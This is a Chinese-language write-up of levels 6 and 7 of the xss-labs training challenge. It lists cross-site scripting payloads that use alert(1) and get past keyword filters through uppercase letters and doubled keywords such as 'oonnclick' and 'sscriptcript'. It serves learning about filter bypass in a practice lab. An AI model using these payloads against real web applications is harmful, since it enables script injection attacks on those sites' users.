5、xss-labs之level6

一、level6-----大小写绕过

1、测试分析

测试了之前用过的payload,发现都不行,并且level4使用的Java伪协议也不行,可以得出<>、script、onclick都被过滤

2、构造payload

因为href被过滤,可以试一下大写HREF

初试payload:

"><a HREF=javascript:alert(1)>xss<a/>//

既然可以大写绕过,那payload就多了,只要能够将value或者input标签闭合并且大写就都可以

"><a HREF=javascript:alert(1)>超链接,并弹窗</a>//

"ONCLICK=alert(1)//

"ONCLICK="alert(1)

"><SCRIPT>alert(1)</SCRIPT>//

二、level7-----双写绕过

1、测试分析

测试过的额payload有:

"οnclick=alert(1)//

"οnclick="alert(1)

"><script>alert(1)</script>//

"><a href=javascript:alert(1)>超链接,并弹窗</a>//

传入payload后,查看源码发现,过滤的有

on

script

href

大小写

2、构造payload

可以采用双写绕过,payload:

"oonnclick=alert(1)//

"oonnclick="alert(1)

"><sscriptcript>alert(1)</sscriptcript>//

"><a hhrefref=javasscriptcript:alert(1)>超链接,并弹窗</a>//

总结:

1、绕过方法还可以使用大写绕过

2、将input标签或者value其中一个闭合就可以尝试插入xss

3、双写可以绕过过滤

相关推荐
Naiva1 天前
【杂记】通用发动机、水泵及发电机组安全注意事项与故障检查指南
网络·安全
小短腿的代码世界1 天前
Qt SSH2 深度解析:安全远程通信架构与源码级实现
qt·安全·架构
X7x51 天前
终端检测与响应(EDR):企业安全防护的“数字哨兵“
网络安全·网络攻击模型·安全威胁分析·安全架构·edr
ZC跨境爬虫1 天前
跟着 MDN 学 HTML day_42:(DOMTokenList 接口详解)
前端·javascript·ui·html·ecmascript·音视频
前端 贾公子1 天前
响应式系统基础:基于依赖追踪的响应式系统的本质(下)
前端·javascript·vue.js
幽络源小助理1 天前
团队个人科技主页HTML源码 黑客帝国风格个人简历网页模板
前端·科技·html
打工人小夏1 天前
使用finalshell在新服务器上部署前端页面
linux·服务器·前端·vue.js
工业机器人销售服务1 天前
直面食品挑战:遨博不锈钢协作机器人如何守护“舌尖上的安全”
安全·机器人
恋猫de小郭1 天前
2026 Android I/O ,全新 AI 手机、 Android PC 和车载驾驶
android·前端·flutter
yqcoder1 天前
JS 中的“空”之双雄:null vs undefined
开发语言·前端·javascript